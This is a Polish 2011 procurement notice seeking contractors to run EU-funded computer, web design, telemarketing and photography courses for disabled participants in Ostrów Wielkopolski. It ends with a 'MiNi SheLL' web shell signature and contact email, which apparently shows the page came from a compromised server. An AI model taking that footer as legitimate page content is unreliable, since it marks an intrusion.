<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursów obsługi komputera i projektowania stron internetowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A) 	Wykonawca zorganizuje i przeprowadzi kurs obsługi komputera dla zaawansowanych                             z programami biurowymi i graficznymi dla 12 osób niepełnosprawnych uczestniczek i uczestników projektu TWOJA SZANSA - w tym 9 kobiet, w wieku od 31 do 58 lat, w jednej grupie - 30 h
w terminie:
od dnia 14 listopada 2011 roku do 18 listopada 2011 roku, 
Razem 5 dni po 6 godzin - od 8.00 do 14.00

Wykonawca:

-zapewni do przeprowadzenia zajęć teoretycznych pomieszczenia wraz z zapleczem sanitarnym odpowiednio dostosowane do potrzeb osób niepełnosprawnych - bez barier architektonicznych w mieście Ostrów Wielkopolski,
-podczas zajęć teoretycznych zapewni uczestnikom kursu poczęstunek (kawa, herbata, ciastka,  jeden ciepły posiłek),  
-	przygotuje program kursu, z wyszczególnieniem celów kursu, planu nauczania określającego tematy zajęć edukacyjnych oraz ich wymiar, wykaz literatury oraz niezbędnych środków                i materiałów dydaktycznych, sposobu sprawdzenia efektów kursu,
-	w programie kursu w ramach programów biurowych może uwzględnić program Word, Excel, Access i Front Page,
-	w programie kursu w ramach programów graficznych może uwzględnić Adobe Photoshop, Corel Draw, Power Point.
-	zobowiązuje się prowadzić listę obecności uczestników ww. kursów (w przypadku nieobecności uczestnika kursu należy niezwłocznie powiadomić koordynatora projektu).
-	zobowiązuje się wydać uczestnikom ww. kursów dokument, potwierdzający udział 
w  kursie wraz z zakresem programowym i godzinowym.
-	dokumentację przeprowadzenia kursu oznakuje stosownymi logotypami.
-	miejsce realizacji kursów oznaczy informacją o współfinansowaniu przez Unię Europejską                z zastosowaniem stosownych logotypów, których wzór dostarczy Zamawiający przed rozpoczęciem kursów. 
-	zabezpieczy bazę dydaktyczną.
-	zobowiązuje się przeprowadzić anonimową ankietę oceny kursów przez uczestników.
-	zapewni kadrę posiadającą odpowiednie wykształcenie, doświadczenie zawodowe                            i uprawnienia.
-	w terminie 7 dni od dnia zakończenia ww. kursu, przekaże do siedziby PCPR następujący komplet dokumentów:
-  oryginał listy obecności uczestników ww. kursu,
- dokument potwierdzony za zgodność z oryginałem, potwierdzający udział w  ww. kursie wraz 
z zakresem programowym i godzinowym,
- anonimową ankietę oceny kursu dokonaną przez uczestników,
- zdjęcia dokumentujące realizację kursu.

Zamawiający:
-	dopuszcza zmianę liczby uczestników kursu
-	w losowych przypadkach uniemożliwiających realizację ww. kursów w zakładanym terminie dopuszcza przesunięcie terminu realizacji kursu.

B)  Wykonawca zorganizuje i przeprowadzi kursu podstawowy obsługi komputera dla 10 osób niepełnosprawnych uczestniczek i uczestników projektu TWOJA SZANSA, w tym 2 kobiet,  w wieku 50+, w tym jedna osoba poruszająca się na wózku elektrycznym, w jednej grupie - 60 h  
w terminie:

- od dnia 07 listopada 2011 roku do 10 listopada 2011 roku, 
- od dnia 14 listopada 2011 roku do dnia 18 listopada 2011 roku.
        Razem 9 dni, w tym: 6 dni po 7 godzin - od 8.00 do 15.00 oraz 3 dni po 6 godzin - od 8.00 do  14.00.

Wykonawca:

-	zapewni do przeprowadzenia zajęć teoretycznych pomieszczenia wraz z zapleczem sanitarnym odpowiednio dostosowane do potrzeb osób niepełnosprawnych - bez barier architektonicznych w mieście Ostrów Wielkopolski,
-	zapewni kadrę posiadającą odpowiednie wykształcenie, doświadczenie zawodowe 
i uprawnienia,
-	podczas zajęć teoretycznych zapewni uczestnikom kursu poczęstunek (kawa, herbata, ciastka, jeden ciepły posiłek),
-	przygotuje program kursu, z wyszczególnieniem celów kursu, planu nauczania określającego tematy zajęć edukacyjnych oraz ich wymiar, wykaz literatury oraz niezbędnych środków              i materiałów dydaktycznych, sposobu sprawdzenia efektów kursu,
-	w programie kursu uwzględni:
1.	Uruchomienie komputera i kończenie pracy na nim, posługiwanie się myszką.
2.	Pulpit w Windows, co można na nim znaleźć i do czego służy.
3.	Uruchamianie i praca z podstawowymi programami.
4.	Przykładowy prosty program do tworzenia rysunków.
5.	Przetwarzanie tekstu.
6.	Internet; obsługa stron internetowych, wyszukiwanie informacji, obsługa poczty elektronicznej.
-	zobowiązuje się prowadzić listę obecności uczestników ww. kursów (w przypadku nieobecności uczestnika kursu należy niezwłocznie powiadomić koordynatora projektu).
-	zobowiązuje się wydać uczestnikom ww. kursów dokument, potwierdzający udział 
w  kursie wraz z zakresem programowym i godzinowym.
-	dokumentację przeprowadzenia kursu oznakuje stosownymi logotypami.
-	zabezpieczy bazę dydaktyczną.
-	miejsce realizacji kursów oznaczy informacją o współfinansowaniu przez Unię Europejską                z zastosowaniem stosownych logotypów, których wzór dostarczy Zamawiający przed rozpoczęciem kursów. 
-	zobowiązuje się przeprowadzić anonimową ankietę oceny kursów przez uczestników.
-	w terminie 7 dni od dnia zakończenia ww. kursu, przekaże do siedziby PCPR następujący komplet dokumentów:
- oryginał listy obecności uczestników ww. kursu,
- dokument potwierdzony za zgodność z oryginałem, potwierdzający udział w  ww. kursie wraz 
z zakresem programowym i godzinowym,
- anonimową ankietę oceny kursu dokonaną przez uczestników,
- zdjęcia dokumentujące realizację kursu.
Zamawiający:
-	dopuszcza zmianę liczby uczestników kursu,
-	w losowych przypadkach uniemożliwiających realizację ww. kursów w zakładanym terminie dopuszcza przesunięcie terminu realizacji kursów.


C)	Wykonawca zorganizuje i przeprowadzi kurs projektowania stron internetowych dla 10 osób niepełnosprawnych uczestniczek i uczestników projektu TWOJA SZANSA, w tym      2 kobiet, w wieku 50+, w tym jedna osoba poruszająca się na wózku elektrycznym,                     w jednej grupie - 30 h
w terminie: 
- od dnia 12 grudnia 2011 roku do dnia 16 grudnia 2011 roku, 
Razem 5 dni, po 6 godzin - od 08.00 do 14.00.

Wykonawca:
-	zapewni do przeprowadzenia zajęć teoretycznych pomieszczenia wraz z zapleczem sanitarnym odpowiednio dostosowane do potrzeb osób niepełnosprawnych - bez barier architektonicznych w mieście Ostrów Wielkopolski,
-	zapewni kadrę posiadającą odpowiednie wykształcenie, doświadczenie zawodowe 
i uprawnienia,
-	podczas zajęć teoretycznych zapewni uczestnikom kursu poczęstunek (kawa, herbata, ciastka, jeden ciepły posiłek),  
-	przygotuje program kursu, z wyszczególnieniem celów kursu, planu nauczania określającego tematy zajęć edukacyjnych oraz ich wymiar, wykaz literatury oraz niezbędnych środków 
i materiałów dydaktycznych, sposobu sprawdzenia efektów kursu,
-	w programie kursu uwzględni:
1.	Podstawy tworzenia stron internetowych w języku HTML, w wymiarze 4 godzin.
2.	Najważniejsze komendy języka HTML, w wymiarze 6 godzin.
3.	Teoretyczne podstawy projektowania graficznego, w wymiarze 7 godzin.
4.	Korzystanie z bezpłatnego edytora stron internetowych KED, w wymiarze 4 godzin.
5.	Umieszczanie grafiki w tekście, w wymiarze 4 godzin.
6.	 Przenośność strony internetowej, w wymiarze 2 godzin.
7.	Publikacja własnej strony na serwerze i zasady polityki prywatności, w wymiarze 3 godzin.
-	zobowiązuje się prowadzić listę obecności uczestników ww. kursów (w przypadku nieobecności uczestnika kursu należy niezwłocznie powiadomić koordynatora projektu).
-	zobowiązuje się wydać uczestnikom ww. kursów dokument, potwierdzający udział 
w  kursie wraz z zakresem programowym i godzinowym.
-	dokumentację przeprowadzenia kursu oznakuje stosownymi logotypami.
-	zabezpieczy bazę dydaktyczną.
-	miejsce realizacji kursów oznaczy informacją o współfinansowaniu przez Unię Europejską                z zastosowaniem stosownych logotypów, których wzór dostarczy Zamawiający przed rozpoczęciem kursów. 
-	zobowiązuje się przeprowadzić anonimową ankietę oceny kursów przez uczestników.
-	w terminie 7 dni od dnia zakończenia ww. kursu, przekaże do siedziby PCPR następujący komplet dokumentów:
- oryginał listy obecności uczestników ww. kursu,
- dokument potwierdzony za zgodność z oryginałem, potwierdzający udział w  ww. kursie wraz 
z zakresem programowym i godzinowym,
- anonimową ankietę oceny kursu dokonaną przez uczestników,
- zdjęcia dokumentujące realizację kursu.

Zamawiający:
-	zapewni tłumacza języka migowego podczas zajęć dla grupy 5 osób niesłyszących uczestniczek i uczestników projektu,
-	w losowych przypadkach uniemożliwiających realizację ww. kursów w zakładanym terminie dopuszcza przesunięcie terminu realizacji kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.32.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu telemarketingu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zorganizuje i przeprowadzi kurs telemarketingu I stopnia dla 10 osób niepełnosprawnych uczestniczek i uczestników projektu TWOJA SZANSA, w tym 2 kobiet, w wieku 50+, w tym jedna osoba poruszającą się na wózku elektrycznym, w jednej grupie - 30 h
w terminie:

 - w dniach 08, 09, 19, 20, 21 grudnia 2011 roku 
 Razem 5 dni po 6 godzin - od 08.00 do 14.00.


Wykonawca:

-	zapewni do przeprowadzenia zajęć teoretycznych pomieszczenia wraz z zapleczem sanitarnym odpowiednio dostosowane do potrzeb osób niepełnosprawnych - bez barier architektonicznych,                w mieście Ostrów Wielkopolski,
-	zapewni kadrę posiadającą odpowiednie wykształcenie, doświadczenie zawodowe                             i uprawnienia,
-	podczas zajęć teoretycznych zapewni uczestnikom kursu poczęstunek (kawa, herbata, ciastka, jeden ciepły posiłek),   
-	przygotuje program kursu, z wyszczególnieniem celów kursu, planu nauczania określającego tematy zajęć edukacyjnych oraz ich wymiar, wykaz literatury oraz niezbędnych środków 
i materiałów dydaktycznych, sposobu sprawdzenia efektów kursu,
-	w programie kursu uwzględni:
1.	Telemarketing we współczesnej gospodarce. 
2.	Przygotowanie do rozmowy telefonicznej.
3.	Budowa i formułowanie przekazu.
4.	Sprzedaż przez telefon.
5.	Co poza mówieniem?
6.	Techniki sprzedaży i negocjacji wykorzystywane w telemarketingu.
7.	Windykacja należności przez telefon.
8.	Praca na własny rachunek czy najemna.
9.	Mierzenie efektywności działań telemarketingowych.
-	zobowiązuje się prowadzić listę obecności uczestników kursu  (w przypadku nieobecności uczestnika kursu należy niezwłocznie powiadomić koordynatora projektu).
-	zobowiązuje się wydać uczestnikom ww. kursu dokument, potwierdzający udział w  kursie wraz 
z zakresem programowym i godzinowym.
-	dokumentację przeprowadzenia kursu oznakuje stosownymi logotypami.
-	Wykonawca zabezpieczy bazę dydaktyczną.
-	miejsce realizacji kursów oznaczy informacją o współfinansowaniu przez Unię Europejską                z zastosowaniem stosownych logotypów, których wzór dostarczy Zamawiający przed rozpoczęciem kursów. 
-	Wykonawca zobowiązuje się przeprowadzić anonimową ankietę oceny kursów przez uczestników.
-	Wykonawca w terminie 7 dni od dnia zakończenia ww. kursu, przekaże do siedziby PCPR następujący komplet dokumentów:
- oryginał listy obecności uczestników ww. kursu,
- dokument potwierdzony za zgodność z oryginałem, potwierdzający udział w  ww. kursie wraz z zakresem programowym i godzinowym,
- anonimową ankietę oceny kursu dokonaną przez uczestników,

Zamawiający: 
- w losowych przypadkach uniemożliwiających realizację ww. kursu w zakładanym terminie dopuszcza przesunięcie terminu realizacji kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu fotograficznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zorganizuje przeprowadzi kurs fotograficzny dla 9 osób niepełnosprawnych uczestniczek i uczestników projektu TWOJA SZANSA - w tym 6 kobiet,  w wieku od 18 do 28 lat, w dwóch grupach - 30 h, w tym jedna osoba na wózku inwalidzkim 
w terminie:

I grupa  - 04 i 05, 07 i 08, 14 listopada 2011 r. - w tym jedna osoba na wózku inwalidzkim
 Razem 5 dni po 6 godzin - od 08.00 do 14.00. (04 listopada 2011 r. od godz. 13.00 do 19.00)

II grupa  - 07 i 08, 14 - 16 listopada 2011 r.

Razem 5 dni po 6 godzin - od 08.00 do 14.00.

Wykonawca:

- zapewni do przeprowadzenia zajęć teoretycznych pomieszczenia wraz z zapleczem sanitarnym odpowiednio dostosowane do potrzeb osób niepełnosprawnych - bez barier architektonicznych 
w mieście Ostrów Wielkopolski,
- zapewni kadrę posiadającą odpowiednie wykształcenie, doświadczenie zawodowe                             i uprawnienia,
- podczas zajęć teoretycznych zapewni uczestnikom kursu poczęstunek (kawa, herbata, ciastka, jeden ciepły posiłek),  
- przygotuje program kursu, z wyszczególnieniem celów kursu, planu nauczania określającego tematy zajęć edukacyjnych oraz ich wymiar, wykaz literatury oraz niezbędnych środków                         i materiałów dydaktycznych, sposobu sprawdzenia efektów kursu,
- w programie kursu uwzględni:
1.	Krótka historia fotografii. Jak powstaje zdjęcie? Zdefiniowanie podstawowych pojęć.
2.	Technika i technologia w fotografii (fotografia analogowa a fotografia cyfrowa).
3.	Zdjęcie - obraz malowany światłem: zdjęcie z głębią i zdjęcie (płaskie), zdjęcie dynamiczne 
i ruch w fotografii, klasyczne proporcje i współczesne kadrowanie.
4.	Klasyczne tematy fotografii (pejzaż, portret, martwa natura, makrofotografia).
5.	Czym zrobić zdjęcie - rodzaje aparatów.
6.	Sztuka ekspozycji:
- czym jest ekspozycja,
- podstawowa kontrola ekspozycji: czułość ISO, czas i przysłona obiektywu.
7.  Głębia ostrości: kiedy istotna, kiedy przeszkadza.
8.  Światło: naturalne i sztuczne, kierunek padania i pora dnia - wpływ na fotografię.
9.  Obróbka zdjęć. Techniki komputerowe w fotografii. Sprzęt. Oprogramowanie.

- zobowiązuje się prowadzić listę obecności uczestników kursu (w przypadku nieobecności uczestnika kursu należy niezwłocznie powiadomić koordynatora projektu).
- zobowiązuje się wydać uczestnikom ww. kursu dokument, potwierdzający udział w kursie wraz 
z zakresem programowym i godzinowym.
- dokumentację przeprowadzenia kursu oznakuje stosownymi logotypami.
- zabezpieczy bazę dydaktyczną.
- miejsce realizacji kursów oznaczy informacją o współfinansowaniu przez Unię Europejską                z zastosowaniem stosownych logotypów, których wzór dostarczy Zamawiający przed rozpoczęciem kursów. 
- zobowiązuje się przeprowadzić anonimową ankietę oceny kursów przez uczestników.
- w terminie 7 dni od dnia zakończenia ww. kursu, przekaże do siedziby PCPR następujący komplet dokumentów:
- oryginał listy obecności uczestników ww. kursu,
- dokument potwierdzony za zgodność z oryginałem, potwierdzający udział w  ww. kursie wraz 
z zakresem programowym i godzinowym,
- anonimową ankietę oceny kursu dokonaną przez uczestników,

Zamawiający: 

- w losowych przypadkach uniemożliwiających realizację ww. kursu w zakładanym terminie dopuszcza przesunięcie terminu realizacji kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com